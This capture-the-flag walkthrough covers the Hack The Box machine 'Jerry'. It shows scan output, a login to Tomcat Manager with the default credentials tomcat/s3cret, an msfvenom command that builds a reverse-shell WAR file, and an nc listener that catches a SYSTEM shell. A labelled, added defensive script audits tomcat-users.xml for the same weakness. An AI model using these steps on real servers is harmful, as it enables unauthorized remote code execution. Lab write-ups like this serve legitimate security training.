Jerry – No Metasploit

Yeah… that’s definitely not the Jerry I remember from Tom and Jerry. Anyway, let’s get started with our usual port scan:

PORT     STATE SERVICE REASON          VERSION
8080/tcp open  http    syn-ack ttl 127 Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012 (90%)
OS CPE: cpe:/o:microsoft
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2012 (90%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (90%),
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
OPS(OI

Okay. Let’s look at some other enumeration scans, namely gobuster on port 8080 and nikto:

kali@hyd3:~/Tools/AutoRecon/results/10.10.10.95/scans$ cat tcp_8080_http_gobuster.txt
/aux (Status: 200) [Size: 0]
/com1 (Status: 200) [Size: 0]
/com4 (Status: 200) [Size: 0]
/com2 (Status: 200) [Size: 0]
/com3 (Status: 200) [Size: 0]
/con (Status: 200) [Size: 0]
/docs (Status: 302) [Size: 0]
/examples (Status: 302) [Size: 0]
/favicon.ico (Status: 200) [Size: 21630]
/host-manager (Status: 302) [Size: 0]
/index.jsp (Status: 200) [Size: 11398]
/manager (Status: 302) [Size: 0]
/nul (Status: 200) [Size: 0]
kali@hyd3:~/Tools/AutoRecon/results/10.10.10.95/scans$ cat tcp_8080_http_nikto.txt
- Nikto v2.1.6
Target IP:          10.10.10.95
Target Hostname:    10.10.10.95
Target Port:        8080
Start Time:         2020-05-28 14:11:59 (GMT-4)
Server: Apache-Coyote/1.1
The anti-clickjacking X-Frame-Options header is not present.
The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
No CGI Directories found (use '-C all' to force check all possible dirs)
OSVDB-39272: /favicon.ico file identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community
Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.

Hmm, okay, interesting… So we could use PUT to place a malicious file on the server? But let’s first see if there’s another way into this box:

Ooh, Apache Tomcat! Pretty familiar with this. Using the default creds tomcat / s3cret, we get in.

Scrolling down, we see we can upload a .war file.

Deploy

Deploy directory or WAR file located on server
    Context Path (required):
    XML Configuration file URL:
    WAR or Directory URL:
    [Deploy]

WAR file to deploy
    Select WAR file to upload: [Browse...] No file selected.
    [Deploy]
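Two things made this box trivial: the example credentials from the Tomcat documentation were left in place, and that account held manager-gui, which is all the deploy form above needs to run a WAR as the Tomcat service user. As an added example that is not part of the original writeup, here is a small defender-side audit that parses tomcat-users.xml and flags both conditions; the sample XML, the short default-credential list and the role set are constructed for this demo.

```python
import xml.etree.ElementTree as ET

# Constructed sample modelled on the example the Tomcat docs ship commented out.
# The second user shows a strong-password account still being flagged because it
# holds a deployment role; the third holds only a read-only role and is not flagged.
SAMPLE_TOMCAT_USERS = """
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
  <user username="deployer" password="Xk9!vQ2#pL7m" roles="manager-script"/>
  <user username="reporter" password="status-only" roles="manager-status"/>
</tomcat-users>
"""

# Roles that permit deploying a WAR, i.e. running arbitrary code on the host.
DEPLOY_ROLES = {"manager-gui", "manager-script", "admin-gui", "admin-script"}

# Short constructed list of widely published example credentials; tomcat/s3cret
# is the pair from the Tomcat docs and the one that worked on this box. Extend as needed.
KNOWN_DEFAULT_CREDS = {("tomcat", "s3cret"), ("tomcat", "tomcat"), ("admin", "admin")}


def _local(tag):
    """Strip an XML namespace so <user> matches with or without xmlns."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return one finding per user that can deploy code or uses known default creds."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        if _local(elem.tag) != "user":
            continue
        # Modern Tomcat uses 'username'; very old configs used 'name'.
        name = elem.get("username") or elem.get("name", "")
        password = elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        reasons = []
        if (name, password) in KNOWN_DEFAULT_CREDS:
            reasons.append("known default credentials")
        if roles & DEPLOY_ROLES:
            reasons.append("deploy-capable roles: " + ", ".join(sorted(roles & DEPLOY_ROLES)))
        if reasons:
            findings.append({"user": name, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"{finding['user']}: {'; '.join(finding['reasons'])}")
```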

Too easy. We can generate a WAR file with msfvenom to get a reverse shell:

kali@hyd3:~/Documents/htb/jerry$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.30 LPORT=4444 -f war > hyd3.war
Payload size: 1089 bytes
Final size of war file: 1089 bytes

Clicking the link navigates us to our WAR file, which triggers the reverse shell:

kali@hyd3:~/Documents/htb/jerry$ rlwrap nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.30] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

whoami
nt authority\system
hostname
JERRY

NT AUTHORITY\SYSTEM shell! A bit anticlimactic, but oh well. Grabbing the flags, we see this was the intended route, since both flags come in a single file named “2 for the price of 1.txt”:
